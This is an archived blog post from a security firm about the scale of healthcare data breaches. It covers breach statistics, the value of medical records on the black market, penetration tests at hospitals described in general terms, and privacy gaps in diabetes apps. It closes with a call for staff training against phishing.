Petronella Blog Archive

Visit our New Blog

The Mind Boggling Prevalence of Healthcare Hacks

Blog Post

In all of the discussions over Wall Street, border security, people’s wives, and hand size during this year’s presidential debates, the subject of cybersecurity has barely been discussed by either party. This is especially troubling since the sheer scope and scale of the amount of personal data lost through attacks on the health care industry is mind boggling.

In February of 2015 alone, Anthem had the files of 78.8 million of its patients hacked. According to the Department of Health and Human Services, the medical records of 113 million patients were compromised last year. That works out to be one in three Americans, and so far in 2016, we’re averaging nearly four breaches a week.

According to John Halamka, the CIO of Beth Israel Deaconess Medical Center in Boston, they get hacked an average of once every seven seconds. In 2011, 2,000 patient x-rays were stolen from the hospital by Chinese hackers, most likely sold to people who were unable to pass the health requirement for travel visas.

While it may be surprising for many to find out, electronic medical records can be 100 times more valuable than credit cards on the black market, with a Medicare or Medicaid records possibly selling for $500 apiece. Each record contains everything a hacker needs to know about a person, including name, social security number, address, employer, and even their children’s names.

Costing around $5.6 billion dollars a year, the health care industry ranked second in most data breaches among all industries. Unlike the financial industry, there aren’t as many safeguards, even though the data is more valuable. If a bank is backed by the FDIC, when a credit card is stolen victims typically don’t lose any money.

Over the last two years, Independent Security Evaluators ran a series of tests on the cybersecurity of 12 health care facilities and two health care data centers. By leaving USB drives with malicious code laying around a hospital they were able to get into a computerized medicine dispensary. Apparently the hospital logo on the drive was enough to convince employees to plug it in and inadvertently run the malicious code it contained. Using a lobby kiosk in another hospital, they were able to hack into the bloodwork records of patients. In another case, the filled out a new patient form online by putting malicious code in all the fields, so that when a doctor or nurse opened it, the code was then installed in the system.

It’s hard to fully grasp the damage that could have been done if the attacks had been real. At the very least, they could have altered dosages of drugs administered to patients, switched patient records, and in some cases, they could have modified the health records of every patient in the breached database.

Not every breach of information lies on the shoulders of the hospitals, some are direct results of the patients themselves. In a recent study, 81% of diabetes apps in the Google Play store lacked any sort of privacy policy. Of the apps with privacy policies, 48.8% shared data with third parties, and 39% did so for advertising purposes. Users are typically fooled into believing that if a medical app has a privacy policy, that the health information entered into the app is private, but that is not the case, and there is no federal law restricting the sale of that information to third parties.

While hospitals have little control over what apps their patients use, there are steps they could take to better educate their employees on how to recognize social engineering and phishing attacks. All the security software in the world can’t help if people continually open emails or click links that lead straight to malicious code.